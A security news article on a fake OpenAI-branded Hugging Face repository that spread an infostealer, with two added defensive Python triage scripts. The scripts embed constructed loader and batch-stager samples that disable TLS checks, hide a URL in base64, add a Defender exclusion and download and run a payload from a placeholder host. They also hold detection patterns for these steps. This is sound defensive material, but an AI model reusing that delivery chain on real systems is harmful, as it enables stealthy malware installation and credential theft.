
Fake OpenAI Hugging Face Repo Spreads Malware

A fake OpenAI Hugging Face repository pushed infostealer malware, exposing passwords, crypto wallets, tokens, and developer credentials. Learn key risks.

FinTech Grid Staff Writer

Fake OpenAI Hugging Face Repository Pushes Infostealer Malware: What Users Need to Know

The rapid growth of artificial intelligence has created new opportunities for developers, researchers, startups, and enterprises. Platforms such as Hugging Face have become essential spaces for sharing AI models, datasets, demos, and machine learning tools. However, this same popularity has also made AI ecosystems attractive targets for cybercriminals.

A recent malware campaign involving a fake OpenAI-themed repository on Hugging Face shows how attackers are now exploiting trust in major AI brands to distribute dangerous software. The malicious repository, named Open-OSS/privacy-filter, impersonated OpenAI’s legitimate “Privacy Filter” project and was reportedly used to deliver information-stealing malware to Windows users.

The incident is a serious reminder that the AI supply chain is now part of the cybersecurity battlefield. Developers, researchers, and companies using open-source AI tools must treat model repositories, scripts, and loaders with the same caution they apply to traditional software packages.

A Fake OpenAI Repository Reaches Hugging Face’s Trending List

According to the reported findings, the malicious Hugging Face repository briefly reached the platform’s trending list and climbed as high as the number one position. Before removal, it accumulated around 244,000 downloads, making the campaign especially alarming for users who may have trusted the repository because of its visibility.

The repository was designed to look legitimate. It copied much of the appearance and language of OpenAI’s Privacy Filter project, creating the impression that it was connected to a real AI privacy tool. This is brand impersonation: a page, package, or account built to be mistaken for a trusted project. It is closely related to typosquatting, where the name itself is a near-miss for the real one, and the two are often combined so that both the name and the page contents point at the trusted brand.

In this case, the repository reportedly used the name Open-OSS/privacy-filter, a name that could easily be mistaken for an official or community-supported OpenAI-related project. For busy developers searching for tools quickly, that kind of naming can be enough to cause confusion.

How the Malware Delivery Worked

The malicious repository reportedly included a file called loader.py. On the surface, this Python script appeared to contain harmless AI-related code. That was part of the deception. The script was designed to look normal enough that users might not immediately suspect anything dangerous.

Behind the scenes, however, the script performed actions that no model loader needs. It disabled TLS (SSL) certificate verification, so that a certificate error on the connection to the attacker’s infrastructure could not stop the download; decoded a base64-encoded URL, which hides the address from anyone skimming the file; connected to that external resource; and retrieved a JSON payload. That payload contained a PowerShell command that executed in a hidden window on Windows machines. Keeping the command on the server rather than in the repository also lets the operator change the payload without touching the published files.

From there, the attack chain continued. The PowerShell command downloaded a batch file named start.bat, which reportedly elevated privileges, downloaded the final malware payload, added the payload to Microsoft Defender exclusions, and executed it. The order matters: adding a Defender exclusion requires administrative rights, so the elevation step is what makes the exclusion, and therefore the undetected execution, possible.

The final payload was described as a Rust-based infostealer known as sefirah. Infostealers are a dangerous category of malware because they are designed to silently collect sensitive information from infected systems and send it to attackers.

What Data Was Targeted?

The malware reportedly targeted a wide range of private and high-value data. This included browser data from Chromium-based and Gecko-based browsers, such as cookies, saved passwords, encryption keys, browsing history, and session tokens.

It also targeted Discord tokens, local databases, cryptocurrency wallets, wallet browser extensions, SSH credentials, FTP credentials, VPN configuration files, and FileZilla data. In addition, the malware searched for sensitive local files, wallet seeds, private keys, system information, and screenshots from multi-monitor setups.

This is especially dangerous because stolen browser sessions and tokens can allow attackers to access accounts without needing the user’s password. Stolen cryptocurrency wallet seeds or private keys can lead to irreversible financial loss. Compromised SSH, FTP, and VPN credentials can also give attackers access to servers, development environments, internal networks, and cloud infrastructure.

The stolen data was reportedly compressed and sent to a command-and-control server using the domain recargapopular[.]com.

Why This Attack Is Important for the AI Community

This campaign is not just another malware story. It highlights a growing security problem in the AI ecosystem. Many developers now download AI models, scripts, notebooks, and tools from public platforms without applying the same level of inspection they would use for traditional software.

AI repositories often contain more than model weights. They may include Python scripts, dependency files, custom loaders, demo apps, configuration files, and automation code. Any of these elements can be abused if users run them without checking what they do.

Attackers understand this. By placing malware inside an AI-related repository and making it appear popular, they can target developers, researchers, students, and companies working with machine learning tools. The fake OpenAI branding increased the credibility of the repository, while its trending status may have encouraged even more downloads.

This is a supply-chain risk. In modern software and AI development, teams often rely on external components. A single malicious script can compromise a developer machine, steal secrets, and potentially expose cloud keys, source code, customer data, or production systems.

Anti-Analysis Features Made the Malware Harder to Detect

The malware reportedly included extensive anti-analysis protections. These features are designed to detect whether the malware is running inside a virtual machine, sandbox, debugger, or malware analysis environment.

Security researchers often use these controlled environments to study malware safely. By detecting them, malicious software can change its behavior, stop running, or hide its real activity. This makes analysis more difficult and can help malware avoid detection by automated security systems.

The use of anti-analysis features suggests that the attackers were not simply experimenting. The campaign appears to have been built with a strong awareness of modern malware detection methods.

Download Numbers May Have Been Manipulated

Although the repository reportedly reached 244,000 downloads, the true number of infected victims remains unclear. Researchers noted that many of the accounts that liked the malicious repository appeared to be auto-generated. This raises the possibility that the download count and popularity signals were artificially inflated.

This tactic is common in social engineering. Attackers try to make malicious content appear trusted by increasing likes, stars, downloads, comments, or rankings. Users may assume that a popular repository is safe, but popularity alone is not a security guarantee.

The incident also reportedly led researchers to discover other repositories using the same malicious loader infrastructure. There were also overlaps with an npm typosquatting campaign connected to the WinOS 4.0 implant, showing that attackers may be reusing infrastructure across different developer ecosystems.

What Affected Users Should Do

Anyone who downloaded or ran files from the fake Hugging Face repository should treat the machine as compromised. Because the malware targeted credentials, tokens, wallets, browser sessions, and local files, simple deletion of the repository files is not enough.

The safest response is to reimage the affected machine from a clean source. Users should then rotate every credential that was stored on or used from it: reset passwords, invalidate browser sessions, revoke API and OAuth tokens, and replace SSH keys, FTP credentials, VPN profiles, and cloud access tokens. A cryptocurrency seed phrase or private key cannot be rotated; any funds in a wallet whose seed or key was on the machine should be moved to a new wallet generated on a clean device.

For businesses, security teams should check endpoint telemetry for the chain described above: PowerShell execution history (Script Block Logging, event ID 4104, together with process command lines) for hidden-window launches and Add-MpPreference calls, the current Microsoft Defender exclusion list and Defender’s own operational log entries for configuration changes, unusual outbound connections from developer machines, and access logs for developer accounts and for the services their stored credentials could reach. Any system that may have been reached with stolen credentials should be reviewed carefully.
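As an added example (written for this article, not tooling from the campaign report or from Microsoft), the Python script below performs the Defender exclusion and PowerShell history review described above offline. It takes an exported list of Defender exclusion paths and a set of PowerShell records (script block text or process command lines), expands any -EncodedCommand payloads so their contents are visible, flags exclusions that cover a whole drive or a user-writable location, and ties each exclusion back to the PowerShell record that added it, noting whether that record ran with a hidden window. The exclusion list, command lines, paths, and timestamps are constructed for the demo; on a real host you would export them with Get-MpPreference (ExclusionPath) and Get-WinEvent and feed the text in.

```python
"""Host triage after a suspected loader run: tie Defender exclusions back to PowerShell activity.

Added example written for this article, not tooling from the campaign report or from
Microsoft. The exclusion list and PowerShell records below are constructed; on a real
host you would export them (Get-MpPreference exclusion paths, event ID 4104 script
blocks and process command lines) and pass the text to triage_exclusions().
"""
import base64
import binascii
import re
from dataclasses import dataclass
from typing import List, Optional

# Locations an administrator rarely excludes on purpose but a stager can write to freely.
WRITABLE_HINTS = ("\\temp\\", "\\appdata\\", "\\downloads\\", "\\users\\public\\", "\\programdata\\")
DRIVE_ROOT = re.compile(r"^[A-Za-z]:\\?$")
# -EncodedCommand and its short forms carry base64 of UTF-16LE script text.
ENCODED_CMD = re.compile(r"(-e(?:c|nc|ncodedcommand)?\s+)([A-Za-z0-9+/=]{8,})", re.IGNORECASE)
EXCLUSION_ADD = re.compile(r"Add-MpPreference\s+[^\n]*?-ExclusionPath\s+['\"]?([^'\"\s;]+)", re.IGNORECASE)
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE)


@dataclass
class PsRecord:
    time: str   # when the command line or script block was logged
    text: str   # command line or script block text as recorded


@dataclass
class ExclusionVerdict:
    path: str
    reasons: List[str]
    added_by: Optional[str]  # timestamp of the PowerShell record that added it, if found


def decode_encoded_command(text: str) -> str:
    """Expand -EncodedCommand payloads in place so later checks see the real script."""
    def expand(m: re.Match) -> str:
        try:
            return m.group(1) + base64.b64decode(m.group(2)).decode("utf-16-le")
        except (binascii.Error, UnicodeDecodeError):
            return m.group(0)  # not valid encoded PowerShell; leave the text unchanged
    return ENCODED_CMD.sub(expand, text)


def triage_exclusions(exclusions: List[str], records: List[PsRecord]) -> List[ExclusionVerdict]:
    """Judge each Defender exclusion: risky location, and was it added from PowerShell?"""
    decoded = [PsRecord(r.time, decode_encoded_command(r.text)) for r in records]
    verdicts: List[ExclusionVerdict] = []
    for path in exclusions:
        low = path.lower()
        reasons: List[str] = []
        added_by: Optional[str] = None
        if DRIVE_ROOT.match(path):
            reasons.append("excludes an entire drive")
        if any(hint in low for hint in WRITABLE_HINTS):
            reasons.append("user-writable location")
        for rec in decoded:
            for m in EXCLUSION_ADD.finditer(rec.text):
                if m.group(1).lower().rstrip("\\") == low.rstrip("\\"):
                    added_by = rec.time
                    reasons.append("added from PowerShell")
                    if HIDDEN_WINDOW.search(rec.text):
                        reasons.append("that PowerShell ran with a hidden window")
        verdicts.append(ExclusionVerdict(path, reasons, added_by))
    return verdicts


# Constructed sample data (not from the campaign): paths, names and times are made up.
SAMPLE_EXCLUSIONS = [
    r"C:\Program Files\VendorBackup",          # plausible, deliberate admin exclusion
    r"C:\Users\dev\AppData\Local\Temp\svc",    # where a constructed stager dropped its payload
    "D:\\",                                   # whole-drive exclusion
]
_ENC = base64.b64encode(
    r"Add-MpPreference -ExclusionPath C:\Users\dev\AppData\Local\Temp\svc".encode("utf-16-le")
).decode()
SAMPLE_RECORDS = [
    PsRecord("2025-01-01T10:00:00", r"Get-ChildItem C:\src | Measure-Object"),
    PsRecord("2025-01-01T10:02:13", f"powershell -w hidden -enc {_ENC}"),
    PsRecord("2025-01-01T10:02:14",
             r"Invoke-WebRequest http://update.example.invalid/svc.exe -OutFile C:\Users\dev\AppData\Local\Temp\svc\svc.exe; "
             r"Start-Process C:\Users\dev\AppData\Local\Temp\svc\svc.exe"),
]

if __name__ == "__main__":
    for v in triage_exclusions(SAMPLE_EXCLUSIONS, SAMPLE_RECORDS):
        added = f" (added {v.added_by})" if v.added_by else ""
        print(f"{v.path}: {'; '.join(v.reasons) or 'no concerns'}{added}")
```

The point of decoding before matching is that a grep of raw logs for Add-MpPreference would miss the second record entirely; only after the UTF-16LE payload is expanded does the exclusion, the hidden window, and the timestamp line up with the entry still present in Defender’s configuration.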

How Developers Can Protect Themselves

Developers and AI practitioners should verify repositories before downloading or running code. Repository names, authors, commit history, official links, and file contents should be checked. A repository that claims to be connected to OpenAI, Google, Meta, Anthropic, Microsoft, or another major company should be confirmed through official channels.

Users should avoid running unknown scripts directly on their main machine. Safer options include isolated virtual machines, containers, restricted environments, and network monitoring. Isolation is not perfect protection, however: malware with anti-analysis features may simply stay dormant inside a VM or sandbox, so a clean run in an isolated environment is not proof that the same script is safe on a real workstation.

It is also important to inspect Python files, shell scripts, batch files, PowerShell commands, and dependency installation steps before running them. Suspicious behavior includes disabling TLS/SSL certificate verification, decoding hidden (for example base64-encoded) URLs, downloading external payloads, modifying antivirus exclusions, launching hidden PowerShell windows, or requesting system privileges the tool has no reason to need.
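The indicators listed here, and the delivery chain described earlier (TLS verification disabled, a base64-encoded URL decoded at runtime, a hidden PowerShell window, a Defender exclusion, a remote payload download), can be checked mechanically before a script is ever run. The following Python triage script is an added example written for this article, not code from the repository, from OpenAI, or from Hugging Face. It greps plain-text indicators line by line and, for Python input, walks the AST to decode any string literal that looks like base64 and reports the ones that turn out to be URLs. The two samples it scans are constructed stand-ins for a loader.py-style script and a start.bat-style stager; the example.invalid URL and the file names in them are placeholders, not indicators from the campaign.

```python
"""Static triage of loader-style scripts for the indicators this article describes.

Added example written for this article, not code from the repository or from
Hugging Face. Both samples are constructed stand-ins (not the real loader.py or
start.bat); the example.invalid URL and file names are placeholders, not IOCs.
"""
import ast
import base64
import binascii
import re
from typing import Dict, List, Tuple

Finding = Tuple[str, int, str]  # (indicator, line number, evidence)

# Indicators that appear as plain text in Python, PowerShell or batch files.
TEXT_INDICATORS: Dict[str, re.Pattern] = {
    "tls-verification-disabled": re.compile(
        r"verify\s*=\s*False|_create_unverified_context|CERT_NONE|check_hostname\s*=\s*False"),
    "hidden-powershell-window": re.compile(
        r"powershell.*?-w(?:indowstyle)?[\s\"',]+hidden", re.IGNORECASE),
    "defender-exclusion-change": re.compile(
        r"(?:Add|Set)-MpPreference|-Exclusion(?:Path|Process|Extension)", re.IGNORECASE),
    "remote-payload-download": re.compile(
        r"Invoke-WebRequest|\biwr\b|DownloadString|DownloadFile|\bcertutil\b|urlopen\(|requests\.get\(",
        re.IGNORECASE),
    "shell-execution-from-python": re.compile(
        r"subprocess\.(?:Popen|run|call|check_output)\(|os\.system\(|os\.popen\("),
}
URL_RE = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)
B64_RE = re.compile(r"^[A-Za-z0-9+/]{16,}={0,2}$")


def hidden_urls(source: str) -> List[Finding]:
    """Report Python string literals that base64-decode to a URL.

    A grep for 'http' misses an encoded address; decoding every literal that looks
    like base64 catches the described pattern (URL hidden in base64, decoded at
    runtime). Input that is not Python is skipped rather than treated as an error.
    """
    try:
        tree = ast.parse(source)
    except SyntaxError:
        return []
    out: List[Finding] = []
    for node in ast.walk(tree):
        if not (isinstance(node, ast.Constant) and isinstance(node.value, str)):
            continue
        if not B64_RE.match(node.value):
            continue
        try:
            decoded = base64.b64decode(node.value, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue
        if URL_RE.match(decoded):
            out.append(("base64-hidden-url", node.lineno, decoded))
    return out


def triage(source: str) -> List[Finding]:
    """Return every indicator found in a script with line number and evidence, sorted by line."""
    findings: List[Finding] = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for name, pattern in TEXT_INDICATORS.items():
            m = pattern.search(line)
            if m:
                findings.append((name, lineno, m.group(0)))
    findings.extend(hidden_urls(source))
    return sorted(findings, key=lambda f: (f[1], f[0]))


# Constructed sample 1: harmless-looking ML helper wrapped around a loader.py-style chain.
_PLACEHOLDER_URL = "https://update.example.invalid/cfg.json"  # constructed, not a real indicator
SAMPLE_LOADER = f'''\
import base64, json, ssl, subprocess, urllib.request
import numpy as np

def normalize(x):
    return (x - x.mean()) / (x.std() + 1e-8)

ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
url = base64.b64decode("{base64.b64encode(_PLACEHOLDER_URL.encode()).decode()}").decode()
cfg = json.loads(urllib.request.urlopen(url, context=ctx).read())
subprocess.Popen(["powershell", "-WindowStyle", "Hidden", "-Command", cfg["cmd"]])
'''

# Constructed sample 2: a start.bat-style stager (exclusion, download, execute).
SAMPLE_BAT = r'''@echo off
powershell -w hidden -c "Add-MpPreference -ExclusionPath %TEMP%\svc"
powershell -w hidden -c "Invoke-WebRequest http://update.example.invalid/svc.exe -OutFile %TEMP%\svc\svc.exe"
start "" %TEMP%\svc\svc.exe
'''

if __name__ == "__main__":
    for label, sample in (("loader.py-style", SAMPLE_LOADER), ("start.bat-style", SAMPLE_BAT)):
        print(f"== {label}")
        for name, lineno, evidence in triage(sample):
            print(f"  line {lineno}: {name}: {evidence}")
```

Any single indicator can have a legitimate explanation (a test harness may disable certificate checks, an installer may call subprocess), so the script reports evidence rather than a verdict; a small ML utility that shows four or five of these together, as the constructed loader does, is what should stop a developer from running it.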

Organizations should apply strict policies for AI tool adoption. This includes dependency scanning, repository allowlists, endpoint detection, secret management, and developer security training. AI teams should not be separated from normal software supply-chain security processes.

A Warning for the Future of Open-Source AI

The fake OpenAI Hugging Face repository is a clear example of how attackers are adapting to the AI boom. As more developers depend on public model hubs and open-source machine learning tools, cybercriminals will continue looking for ways to exploit trust, urgency, and brand recognition.

Hugging Face and similar platforms have security measures in place, but no public platform can fully eliminate abuse. The responsibility is shared between platforms, researchers, developers, enterprises, and individual users.

The key lesson is simple: AI tools are software, and software can be weaponized. A model repository may look harmless, but if it includes executable code, loaders, scripts, or installation commands, it deserves careful review.

As AI adoption grows, security must grow with it. Developers should treat every download as a potential risk, especially when it comes from a newly created repository, uses a famous brand name, or asks users to run code without clear explanation.

Final Thoughts

The malicious Hugging Face repository impersonating OpenAI’s Privacy Filter project shows how quickly cyber threats can enter trusted AI spaces. By combining brand impersonation, fake popularity, hidden malware delivery, and information-stealing payloads, attackers created a campaign that could have exposed passwords, tokens, wallets, and developer credentials.

For users, the safest approach is caution. For companies, the incident is a reminder that AI supply-chain security is no longer optional. Any organization using open-source AI models or tools should build clear security checks into its workflow.

The future of AI depends not only on innovation but also on trust. Protecting that trust requires stronger verification, safer development habits, and a realistic understanding that cybercriminals are now watching the AI ecosystem closely.
